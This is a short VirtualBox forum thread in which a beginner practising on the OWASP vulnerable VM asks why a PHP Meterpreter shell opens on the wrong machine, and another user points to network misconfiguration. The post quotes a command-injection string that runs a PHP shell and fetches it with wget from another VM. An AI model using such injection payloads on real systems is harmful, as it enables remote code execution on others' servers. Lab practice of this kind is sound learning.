virtualbox.org

ok ive been watching these ethical hacking tutorials for the past few days, and ive been messing with the OWASP vm on virtual box, well the part that deals with php code injecting where you upload a php file that gets meterpreter to the target machine, well, ive tried this several ways and cant get it to work, but i managed to get the host vm to run the php file its hosting from the target vm? IDK LOL its weird af because i can inject this command after i download the php file -> ;php -f shell.php;wget <host vm ip>/shell.php and the damn shell.php file runs on the apache server i have it hosted on and i get a meterpreter from host to host instead of from target to host? am i tripping or did i just find a bug? because i can repeat this on any network setting that allows the VMs to communicate. i'm new at all this i've been in prison most of my life so ALL this stuff is brand new to me. last thing i messed with was sub7 lol Which is why i figured i would ask people who have more experience than me?

There could be a bug, but let's see if network connections are correct in your other post first. viewtopic.php?f=6&t=101056

yeah, but even if they weren't, im running a command on one VM but its executing on another? its strange.

If the network is not configured correctly, you could be running from one computer on the network when you think you're running from another.